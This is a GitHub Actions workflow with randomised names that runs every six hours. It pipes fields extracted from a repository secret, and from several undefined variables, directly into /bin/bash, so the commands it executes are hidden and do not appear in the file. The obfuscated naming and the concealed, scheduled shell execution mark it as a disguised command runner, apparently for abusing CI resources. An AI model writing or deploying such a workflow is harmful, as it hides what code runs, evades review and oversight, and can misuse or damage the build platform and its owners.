name: xiaolouzhu6789

on:
  workflow_dispatch:
  schedule:
    - cron: '1 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaolouzhu6789
        env:
          ztkva5822: ${{ secrets.ztkva5822 }}
        run: |
          echo $ztkva5822 | jq -r .ip13 | /bin/bash
          echo $tq427 | jq -r .ydg573 | /bin/bash
          echo $lykbj16 | jq -r .ewsoa46 | /bin/bash
          echo $bg5 | jq -r .xied24 | /bin/bash
          echo $y86 | jq -r .ojdb08 | /bin/bash
          echo $m8 | jq -r .d97 | /bin/bash
          echo $cufef31 | jq -r .nzcxh62402 | /bin/bash
          echo $jwtzq7155 | jq -r .avwre9081 | /bin/bash
          echo $hunk03834 | jq -r .g1 | /bin/bash
          echo $vh40830 | jq -r .fefe419 | /bin/bash

